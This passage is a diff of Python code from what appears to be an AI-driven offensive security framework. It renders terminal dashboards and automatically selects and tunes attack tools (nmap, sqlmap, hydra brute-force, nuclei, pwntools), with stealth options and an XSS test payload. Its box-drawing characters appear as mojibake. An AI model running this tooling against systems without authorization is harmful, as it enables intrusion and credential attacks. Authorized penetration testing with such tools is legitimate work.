โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— +โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ• โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ•โ• โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ•šโ•โ• โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ• โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ• โ•šโ•โ• โ•šโ•โ• โ•šโ•โ•โ•šโ•โ•โ•šโ•โ• โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ• {RESET} @@ -200,7 +200,7 @@ class ModernVisualEngine: [INFO] Blood-red theme engaged โ€“ unified offensive operations UI{RESET} """ return banner - + @staticmethod def create_progress_bar(current: int, total: int, width: int = 50, tool: str = "") -> str: """Create a beautiful progress bar with cyberpunk styling""" @@ -208,10 +208,10 @@ class ModernVisualEngine: percentage = 0 else: percentage = min(100, (current / total) * 100) - + filled = int(width * percentage / 100) bar = 'โ–ˆ' * filled + 'โ–‘' * (width - filled) - + border = ModernVisualEngine.COLORS['PRIMARY_BORDER'] fill_col = ModernVisualEngine.COLORS['ACCENT_LINE'] return f""" @@ -220,17 +220,17 @@ class ModernVisualEngine: โ””โ”€{'โ”€' * (width + 10)}โ”˜{ModernVisualEngine.COLORS['RESET']}""" @staticmethod - def render_progress_bar(progress: float, width: int = 40, style: str = 'cyber', + def render_progress_bar(progress: float, width: int = 40, style: str = 'cyber', label: str = "", eta: float = 0, speed: str = "") -> str: """Render a beautiful progress bar with multiple styles""" - + # Clamp progress between 0 and 1 progress = max(0.0, min(1.0, progress)) - + # Calculate filled and empty portions filled_width = int(width * progress) empty_width = width - filled_width - + # Style-specific rendering if style == 'cyber': filled_char = 'โ–ˆ' @@ -252,22 +252,22 @@ class ModernVisualEngine: empty_char = 'โ–‘' bar_color = ModernVisualEngine.COLORS['ACCENT_LINE'] progress_color = ModernVisualEngine.COLORS['PRIMARY_BORDER'] - + # Build the progress bar filled_part = bar_color + filled_char * filled_width empty_part = ModernVisualEngine.COLORS['TERMINAL_GRAY'] + empty_char * empty_width percentage = f"{progress * 100:.1f}%" - + # Add ETA and speed if provided extra_info = "" if eta > 0: extra_info += f" ETA: {eta:.1f}s" if speed: extra_info += f" Speed: {speed}" - + # Build final progress bar bar_display = f"[{filled_part}{empty_part}{ModernVisualEngine.COLORS['RESET']}] {progress_color}{percentage}{ModernVisualEngine.COLORS['RESET']}" - + if label: return f"{label}: {bar_display}{extra_info}" else: @@ -276,7 +276,7 @@ class ModernVisualEngine: @staticmethod def create_live_dashboard(processes: Dict[int, Dict[str, Any]]) -> str: """Create a live dashboard showing all active processes""" - + if not processes: return f""" {ModernVisualEngine.COLORS['PRIMARY_BORDER']}โ•ญโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ @@ -285,35 +285,35 @@ class ModernVisualEngine: โ”‚ {ModernVisualEngine.COLORS['TERMINAL_GRAY']}No active processes currently running{ModernVisualEngine.COLORS['PRIMARY_BORDER']} โ”‚ โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ{ModernVisualEngine.COLORS['RESET']} """ - + dashboard_lines = [ f"{ModernVisualEngine.COLORS['PRIMARY_BORDER']}โ•ญโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ", f"โ”‚ {ModernVisualEngine.COLORS['ACCENT_LINE']}๐Ÿ“Š HEXSTRIKE LIVE DASHBOARD{ModernVisualEngine.COLORS['PRIMARY_BORDER']} โ”‚", f"โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค" ] - + for pid, proc_info in processes.items(): status = proc_info.get('status', 'unknown') command = proc_info.get('command', 'unknown')[:50] + "..." if len(proc_info.get('command', '')) > 50 else proc_info.get('command', 'unknown') duration = proc_info.get('duration', 0) - + status_color = ModernVisualEngine.COLORS['ACCENT_LINE'] if status == 'running' else ModernVisualEngine.COLORS['HACKER_RED'] - + dashboard_lines.append( f"โ”‚ {ModernVisualEngine.COLORS['CYBER_ORANGE']}PID {pid}{ModernVisualEngine.COLORS['PRIMARY_BORDER']} | {status_color}{status}{ModernVisualEngine.COLORS['PRIMARY_BORDER']} | {ModernVisualEngine.COLORS['BRIGHT_WHITE']}{command}{ModernVisualEngine.COLORS['PRIMARY_BORDER']} โ”‚" ) - + dashboard_lines.append(f"โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ{ModernVisualEngine.COLORS['RESET']}") - + return "\n".join(dashboard_lines) - + @staticmethod def format_vulnerability_card(vuln_data: Dict[str, Any]) -> str: """Format vulnerability as a beautiful card""" severity = vuln_data.get('severity', 'unknown').upper() name = vuln_data.get('name', 'Unknown Vulnerability') description = vuln_data.get('description', 'No description available') - + # Severity color mapping severity_colors = { 'CRITICAL': ModernVisualEngine.COLORS['VULN_CRITICAL'], @@ -322,9 +322,9 @@ class ModernVisualEngine: 'LOW': ModernVisualEngine.COLORS['CYBER_ORANGE'], 'INFO': ModernVisualEngine.COLORS['TERMINAL_GRAY'] } - + color = severity_colors.get(severity, ModernVisualEngine.COLORS['TERMINAL_GRAY']) - + return f""" {color}โ”Œโ”€ ๐Ÿšจ VULNERABILITY DETECTED โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” โ”‚ {ModernVisualEngine.COLORS['BRIGHT_WHITE']}{name:<60}{color} โ”‚ @@ -342,22 +342,22 @@ class ModernVisualEngine: 'RECOVERY': ModernVisualEngine.COLORS['TOOL_RECOVERY'], 'WARNING': ModernVisualEngine.COLORS['WARNING'] } - + color = error_colors.get(error_type.upper(), ModernVisualEngine.COLORS['ERROR']) - + card = f""" {color}โ”Œโ”€ ๐Ÿ”ฅ ERROR DETECTED โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”{ModernVisualEngine.COLORS['RESET']} {color}โ”‚ {ModernVisualEngine.COLORS['BRIGHT_WHITE']}Tool: {tool_name:<55}{color} โ”‚{ModernVisualEngine.COLORS['RESET']} {color}โ”‚ {ModernVisualEngine.COLORS['BRIGHT_WHITE']}Type: {error_type:<55}{color} โ”‚{ModernVisualEngine.COLORS['RESET']} {color}โ”‚ {ModernVisualEngine.COLORS['BRIGHT_WHITE']}Error: {error_message[:53]:<53}{color} โ”‚{ModernVisualEngine.COLORS['RESET']}""" - + if recovery_action: card += f""" {color}โ”‚ {ModernVisualEngine.COLORS['TOOL_RECOVERY']}Recovery: {recovery_action[:50]:<50}{color} โ”‚{ModernVisualEngine.COLORS['RESET']}""" - + card += f""" {color}โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜{ModernVisualEngine.COLORS['RESET']}""" - + return card @staticmethod @@ -370,16 +370,16 @@ class ModernVisualEngine: 'TIMEOUT': ModernVisualEngine.COLORS['TOOL_TIMEOUT'], 'RECOVERY': ModernVisualEngine.COLORS['TOOL_RECOVERY'] } - + color = status_colors.get(status.upper(), ModernVisualEngine.COLORS['INFO']) - + # Create progress bar if progress > 0 progress_bar = "" if progress > 0: filled = int(20 * progress) empty = 20 - filled progress_bar = f" [{ModernVisualEngine.COLORS['PROGRESS_BAR']}{'โ–ˆ' * filled}{ModernVisualEngine.COLORS['PROGRESS_EMPTY']}{'โ–‘' * empty}{ModernVisualEngine.COLORS['RESET']}] {progress*100:.1f}%" - + return f"{color}๐Ÿ”ง {tool_name.upper()}{ModernVisualEngine.COLORS['RESET']} | {color}{status}{ModernVisualEngine.COLORS['RESET']} | {ModernVisualEngine.COLORS['BRIGHT_WHITE']}{target}{ModernVisualEngine.COLORS['RESET']}{progress_bar}" @staticmethod @@ -392,7 +392,7 @@ class ModernVisualEngine: 'BLUE': ModernVisualEngine.COLORS['HIGHLIGHT_BLUE'], 'PURPLE': ModernVisualEngine.COLORS['HIGHLIGHT_PURPLE'] } - + color = highlight_colors.get(highlight_type.upper(), ModernVisualEngine.COLORS['HIGHLIGHT_RED']) return f"{color} {text} {ModernVisualEngine.COLORS['RESET']}" @@ -406,17 +406,17 @@ class ModernVisualEngine: 'LOW': ModernVisualEngine.COLORS['VULN_LOW'], 'INFO': ModernVisualEngine.COLORS['VULN_INFO'] } - + color = severity_colors.get(severity.upper(), ModernVisualEngine.COLORS['INFO']) count_text = f" ({count})" if count > 0 else "" - + return f"{color}{severity.upper()}{count_text}{ModernVisualEngine.COLORS['RESET']}" @staticmethod def create_section_header(title: str, icon: str = "๐Ÿ”ฅ", color: str = "FIRE_RED") -> str: """Create a section header with reddish styling""" header_color = ModernVisualEngine.COLORS.get(color, ModernVisualEngine.COLORS['FIRE_RED']) - + return f""" {header_color}{'โ•' * 70}{ModernVisualEngine.COLORS['RESET']} {header_color}{icon} {title.upper()}{ModernVisualEngine.COLORS['RESET']} @@ -432,10 +432,10 @@ class ModernVisualEngine: 'FAILED': ModernVisualEngine.COLORS['TOOL_FAILED'], 'TIMEOUT': ModernVisualEngine.COLORS['TOOL_TIMEOUT'] } - + color = status_colors.get(status.upper(), ModernVisualEngine.COLORS['INFO']) duration_text = f" ({duration:.2f}s)" if duration > 0 else "" - + return f"{color}โ–ถ {command[:60]}{'...' if len(command) > 60 else ''} | {status.upper()}{duration_text}{ModernVisualEngine.COLORS['RESET']}" # ============================================================================ @@ -488,7 +488,7 @@ class TargetProfile: attack_surface_score: float = 0.0 risk_level: str = "unknown" confidence_score: float = 0.0 - + def to_dict(self) -> Dict[str, Any]: """Convert TargetProfile to dictionary for JSON serialization""" return { @@ -518,7 +518,7 @@ class AttackStep: success_probability: float execution_time_estimate: int # seconds dependencies: List[str] = field(default_factory=list) - + class AttackChain: """Represents a sequence of attacks for maximum impact""" def __init__(self, target_profile: TargetProfile): @@ -528,26 +528,26 @@ class AttackChain: self.estimated_time: int = 0 self.required_tools: Set[str] = set() self.risk_level: str = "unknown" - + def add_step(self, step: AttackStep): """Add a step to the attack chain""" self.steps.append(step) self.required_tools.add(step.tool) self.estimated_time += step.execution_time_estimate - + def calculate_success_probability(self): """Calculate overall success probability of the attack chain""" if not self.steps: self.success_probability = 0.0 return - + # Use compound probability for sequential steps prob = 1.0 for step in self.steps: prob *= step.success_probability - + self.success_probability = prob - + def to_dict(self) -> Dict[str, Any]: """Convert AttackChain to dictionary""" return { @@ -571,13 +571,13 @@ class AttackChain: class IntelligentDecisionEngine: """AI-powered tool selection and parameter optimization engine""" - + def __init__(self): self.tool_effectiveness = self._initialize_tool_effectiveness() self.technology_signatures = self._initialize_technology_signatures() self.attack_patterns = self._initialize_attack_patterns() self._use_advanced_optimizer = True # Enable advanced optimization by default - + def _initialize_tool_effectiveness(self) -> Dict[str, Dict[str, float]]: """Initialize tool effectiveness ratings for different target types""" return { @@ -665,7 +665,7 @@ class IntelligentDecisionEngine: "pwninit": 0.85 # Great for CTF setup } } - + def _initialize_technology_signatures(self) -> Dict[str, Dict[str, List[str]]]: """Initialize technology detection signatures""" return { @@ -694,7 +694,7 @@ class IntelligentDecisionEngine: TechnologyStack.NODEJS.value: [3000, 8000, 8080, 9000] } } - + def _initialize_attack_patterns(self) -> Dict[str, List[Dict[str, Any]]]: """Initialize common attack patterns for different scenarios""" return { @@ -807,34 +807,34 @@ class IntelligentDecisionEngine: {"tool": "dalfox", "priority": 4, "params": {"blind": True, "mining_dom": True, "custom_payload": "alert(document.domain)"}} ] } - + def analyze_target(self, target: str) -> TargetProfile: """Analyze target and create comprehensive profile""" profile = TargetProfile(target=target) - + # Determine target type profile.target_type = self._determine_target_type(target) - + # Basic network analysis if profile.target_type in [TargetType.WEB_APPLICATION, TargetType.API_ENDPOINT]: profile.ip_addresses = self._resolve_domain(target) - + # Technology detection (basic heuristics) if profile.target_type == TargetType.WEB_APPLICATION: profile.technologies = self._detect_technologies(target) profile.cms_type = self._detect_cms(target) - + # Calculate attack surface score profile.attack_surface_score = self._calculate_attack_surface(profile) - + # Determine risk level profile.risk_level = self._determine_risk_level(profile) - + # Set confidence score profile.confidence_score = self._calculate_confidence(profile) - + return profile - + def _determine_target_type(self, target: str) -> TargetType: """Determine the type of target for appropriate tool selection""" # URL patterns @@ -843,25 +843,25 @@ class IntelligentDecisionEngine: if '/api/' in parsed.path or parsed.path.endswith('/api'): return TargetType.API_ENDPOINT return TargetType.WEB_APPLICATION - + # IP address pattern if re.match(r'^(\d{1,3}\.){3}\d{1,3}$', target): return TargetType.NETWORK_HOST - + # Domain name pattern if re.match(r'^[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$', target): return TargetType.WEB_APPLICATION - + # File patterns if target.endswith(('.exe', '.bin', '.elf', '.so', '.dll')): return TargetType.BINARY_FILE - + # Cloud service patterns if any(cloud in target.lower() for cloud in ['amazonaws.com', 'azure', 'googleapis.com']): return TargetType.CLOUD_SERVICE - + return TargetType.UNKNOWN - + def _resolve_domain(self, target: str) -> List[str]: """Resolve domain to IP addresses""" try: @@ -869,50 +869,50 @@ class IntelligentDecisionEngine: hostname = urllib.parse.urlparse(target).hostname else: hostname = target - + if hostname: ip = socket.gethostbyname(hostname) return [ip] except Exception: pass return [] - + def _detect_technologies(self, target: str) -> List[TechnologyStack]: """Detect technologies using basic heuristics""" technologies = [] - + # This is a simplified version - in practice, you'd make HTTP requests # and analyze headers, content, etc. - + # For now, return some common technologies based on target patterns if 'wordpress' in target.lower() or 'wp-' in target.lower(): technologies.append(TechnologyStack.WORDPRESS) - + if any(ext in target.lower() for ext in ['.php', 'php']): technologies.append(TechnologyStack.PHP) - + if any(ext in target.lower() for ext in ['.asp', '.aspx']): technologies.append(TechnologyStack.DOTNET) - + return technologies if technologies else [TechnologyStack.UNKNOWN] - + def _detect_cms(self, target: str) -> Optional[str]: """Detect CMS type""" target_lower = target.lower() - + if 'wordpress' in target_lower or 'wp-' in target_lower: return "WordPress" elif 'drupal' in target_lower: return "Drupal" elif 'joomla' in target_lower: return "Joomla" - + return None - + def _calculate_attack_surface(self, profile: TargetProfile) -> float: """Calculate attack surface score based on profile""" score = 0.0 - + # Base score by target type type_scores = { TargetType.WEB_APPLICATION: 7.0, @@ -921,24 +921,24 @@ class IntelligentDecisionEngine: TargetType.CLOUD_SERVICE: 5.0, TargetType.BINARY_FILE: 4.0 } - + score += type_scores.get(profile.target_type, 3.0) - + # Add points for technologies score += len(profile.technologies) * 0.5 - + # Add points for open ports score += len(profile.open_ports) * 0.3 - + # Add points for subdomains score += len(profile.subdomains) * 0.2 - + # CMS adds attack surface if profile.cms_type: score += 1.5 - + return min(score, 10.0) # Cap at 10.0 - + def _determine_risk_level(self, profile: TargetProfile) -> str: """Determine risk level based on attack surface""" if profile.attack_surface_score >= 8.0: @@ -951,11 +951,11 @@ class IntelligentDecisionEngine: return "low" else: return "minimal" - + def _calculate_confidence(self, profile: TargetProfile) -> float: """Calculate confidence score in the analysis""" confidence = 0.5 # Base confidence - + # Increase confidence based on available data if profile.ip_addresses: confidence += 0.1 @@ -965,17 +965,17 @@ class IntelligentDecisionEngine: confidence += 0.1 if profile.target_type != TargetType.UNKNOWN: confidence += 0.1 - + return min(confidence, 1.0) - + def select_optimal_tools(self, profile: TargetProfile, objective: str = "comprehensive") -> List[str]: """Select optimal tools based on target profile and objective""" target_type = profile.target_type.value effectiveness_map = self.tool_effectiveness.get(target_type, {}) - + # Get base tools for target type base_tools = list(effectiveness_map.keys()) - + # Apply objective-based filtering if objective == "quick": # Select top 3 most effective tools @@ -990,28 +990,28 @@ class IntelligentDecisionEngine: selected_tools = [tool for tool in base_tools if tool in stealth_tools] else: selected_tools = base_tools - + # Add technology-specific tools for tech in profile.technologies: if tech == TechnologyStack.WORDPRESS and "wpscan" not in selected_tools: selected_tools.append("wpscan") elif tech == TechnologyStack.PHP and "nikto" not in selected_tools: selected_tools.append("nikto") - + return selected_tools - + def optimize_parameters(self, tool: str, profile: TargetProfile, context: Dict[str, Any] = None) -> Dict[str, Any]: """Enhanced parameter optimization with advanced intelligence""" if context is None: context = {} - + # Use advanced parameter optimizer if available if hasattr(self, '_use_advanced_optimizer') and self._use_advanced_optimizer: return parameter_optimizer.optimize_parameters_advanced(tool, profile, context) - + # Fallback to legacy optimization for compatibility optimized_params = {} - + # Tool-specific parameter optimization if tool == "nmap": optimized_params = self._optimize_nmap_params(profile, context) @@ -1056,40 +1056,40 @@ class IntelligentDecisionEngine: else: # Use advanced optimizer for unknown tools return parameter_optimizer.optimize_parameters_advanced(tool, profile, context) - + return optimized_params - + def enable_advanced_optimization(self): """Enable advanced parameter optimization""" self._use_advanced_optimizer = True - + def disable_advanced_optimization(self): """Disable advanced parameter optimization (use legacy)""" self._use_advanced_optimizer = False - + def _optimize_nmap_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Nmap parameters""" params = {"target": profile.target} - + if profile.target_type == TargetType.WEB_APPLICATION: params["scan_type"] = "-sV -sC" params["ports"] = "80,443,8080,8443,8000,9000" elif profile.target_type == TargetType.NETWORK_HOST: params["scan_type"] = "-sS -O" params["additional_args"] = "--top-ports 1000" - + # Adjust timing based on stealth requirements if context.get("stealth", False): params["additional_args"] = params.get("additional_args", "") + " -T2" else: params["additional_args"] = params.get("additional_args", "") + " -T4" - + return params - + def _optimize_gobuster_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Gobuster parameters""" params = {"url": profile.target, "mode": "dir"} - + # Select wordlist based on detected technologies if TechnologyStack.PHP in profile.technologies: params["additional_args"] = "-x php,html,txt,xml" @@ -1099,25 +1099,25 @@ class IntelligentDecisionEngine: params["additional_args"] = "-x jsp,html,txt,xml" else: params["additional_args"] = "-x html,php,txt,js" - + # Adjust threads based on target type if context.get("aggressive", False): params["additional_args"] += " -t 50" else: params["additional_args"] += " -t 20" - + return params - + def _optimize_nuclei_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Nuclei parameters""" params = {"target": profile.target} - + # Set severity based on context if context.get("quick", False): params["severity"] = "critical,high" else: params["severity"] = "critical,high,medium" - + # Add technology-specific tags tags = [] for tech in profile.technologies: @@ -1127,16 +1127,16 @@ class IntelligentDecisionEngine: tags.append("drupal") elif tech == TechnologyStack.JOOMLA: tags.append("joomla") - + if tags: params["tags"] = ",".join(tags) - + return params - + def _optimize_sqlmap_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize SQLMap parameters""" params = {"url": profile.target} - + # Add database-specific options based on detected technologies if TechnologyStack.PHP in profile.technologies: params["additional_args"] = "--dbms=mysql --batch" @@ -1144,35 +1144,35 @@ class IntelligentDecisionEngine: params["additional_args"] = "--dbms=mssql --batch" else: params["additional_args"] = "--batch" - + # Adjust aggressiveness if context.get("aggressive", False): params["additional_args"] += " --level=3 --risk=2" - + return params - + def _optimize_ffuf_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize FFuf parameters""" params = {"url": profile.target} - + # Set match codes based on target type if profile.target_type == TargetType.API_ENDPOINT: params["match_codes"] = "200,201,202,204,301,302,401,403" else: params["match_codes"] = "200,204,301,302,307,401,403" - + # Adjust threads if context.get("stealth", False): params["additional_args"] = "-t 10 -p 1" else: params["additional_args"] = "-t 40" - + return params - + def _optimize_hydra_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Hydra parameters""" params = {"target": profile.target} - + # Determine service based on open ports if 22 in profile.open_ports: params["service"] = "ssh" @@ -1182,16 +1182,16 @@ class IntelligentDecisionEngine: params["service"] = "http-get" else: params["service"] = "ssh" # Default - + # Set conservative parameters to avoid lockouts params["additional_args"] = "-t 4 -w 30" - + return params - + def _optimize_rustscan_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Rustscan parameters""" params = {"target": profile.target} - + # Adjust performance based on context if context.get("stealth", False): params["ulimit"] = 1000 @@ -1205,17 +1205,17 @@ class IntelligentDecisionEngine: params["ulimit"] = 5000 params["batch_size"] = 4500 params["timeout"] = 1500 - + # Enable scripts for comprehensive scans if context.get("objective", "normal") == "comprehensive": params["scripts"] = True - + return params - + def _optimize_masscan_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Masscan parameters""" params = {"target": profile.target} - + # Intelligent rate limiting based on target type if context.get("stealth", False): params["rate"] = 100 @@ -1224,17 +1224,17 @@ class IntelligentDecisionEngine: else: # Default intelligent rate params["rate"] = 1000 - + # Enable banners for service detection if context.get("service_detection", True): params["banners"] = True - + return params - + def _optimize_nmap_advanced_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize advanced Nmap parameters""" params = {"target": profile.target} - + # Select scan type based on context if context.get("stealth", False): params["scan_type"] = "-sS" @@ -1249,25 +1249,25 @@ class IntelligentDecisionEngine: params["timing"] = "T4" params["os_detection"] = True params["version_detection"] = True - + # Add NSE scripts based on target type if profile.target_type == TargetType.WEB_APPLICATION: params["nse_scripts"] = "http-*,ssl-*" elif profile.target_type == TargetType.NETWORK_HOST: params["nse_scripts"] = "default,discovery,safe" - + return params - + def _optimize_enum4linux_ng_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Enum4linux-ng parameters""" params = {"target": profile.target} - + # Enable comprehensive enumeration by default params["shares"] = True params["users"] = True params["groups"] = True params["policy"] = True - + # Add authentication if available in context if context.get("username"): params["username"] = context["username"] @@ -1275,13 +1275,13 @@ class IntelligentDecisionEngine: params["password"] = context["password"] if context.get("domain"): params["domain"] = context["domain"] - + return params - + def _optimize_autorecon_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize AutoRecon parameters""" params = {"target": profile.target} - + # Adjust scan depth based on objective if context.get("quick", False): params["port_scans"] = "top-100-ports" @@ -1289,16 +1289,16 @@ class IntelligentDecisionEngine: elif context.get("comprehensive", True): params["port_scans"] = "top-1000-ports" params["timeout"] = 600 - + # Set output directory params["output_dir"] = f"/tmp/autorecon_{profile.target.replace('.', '_')}" - + return params - + def _optimize_ghidra_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Ghidra parameters""" params = {"binary": profile.target} - + # Adjust analysis timeout based on context if context.get("quick", False): params["analysis_timeout"] = 120 @@ -1306,17 +1306,17 @@ class IntelligentDecisionEngine: params["analysis_timeout"] = 600 else: params["analysis_timeout"] = 300 - + # Set project name based on binary binary_name = os.path.basename(profile.target).replace('.', '_') params["project_name"] = f"hexstrike_{binary_name}" - + return params - + def _optimize_pwntools_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Pwntools parameters""" params = {"target_binary": profile.target} - + # Set exploit type based on context if context.get("remote_host") and context.get("remote_port"): params["exploit_type"] = "remote" @@ -1324,13 +1324,13 @@ class IntelligentDecisionEngine: params["target_port"] = context["remote_port"] else: params["exploit_type"] = "local" - + return params - + def _optimize_ropper_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Ropper parameters""" params = {"binary": profile.target} - + # Set gadget type and quality based on context if context.get("exploit_type") == "rop": params["gadget_type"] = "rop" @@ -1341,17 +1341,17 @@ class IntelligentDecisionEngine: else: params["gadget_type"] = "all" params["quality"] = 2 - + # Set architecture if known if context.get("arch"): params["arch"] = context["arch"] - + return params - + def _optimize_angr_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize angr parameters""" params = {"binary": profile.target} - + # Set analysis type based on context if context.get("symbolic_execution", True): params["analysis_type"] = "symbolic" @@ -1359,56 +1359,56 @@ class IntelligentDecisionEngine: params["analysis_type"] = "cfg" else: params["analysis_type"] = "static" - + # Add find/avoid addresses if provided if context.get("find_address"): params["find_address"] = context["find_address"] if context.get("avoid_addresses"): params["avoid_addresses"] = context["avoid_addresses"] - + return params - + def _optimize_prowler_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Prowler parameters""" params = {"provider": "aws"} - + # Set provider based on context or target analysis if context.get("cloud_provider"): params["provider"] = context["cloud_provider"] - + # Set profile and region if context.get("aws_profile"): params["profile"] = context["aws_profile"] if context.get("aws_region"): params["region"] = context["aws_region"] - + # Set output format and directory params["output_format"] = "json" params["output_dir"] = f"/tmp/prowler_{params['provider']}" - + return params - + def _optimize_scout_suite_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Scout Suite parameters""" params = {"provider": "aws"} - + # Set provider based on context if context.get("cloud_provider"): params["provider"] = context["cloud_provider"] - + # Set profile for AWS if params["provider"] == "aws" and context.get("aws_profile"): params["profile"] = context["aws_profile"] - + # Set report directory params["report_dir"] = f"/tmp/scout-suite_{params['provider']}" - + return params - + def _optimize_kube_hunter_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize kube-hunter 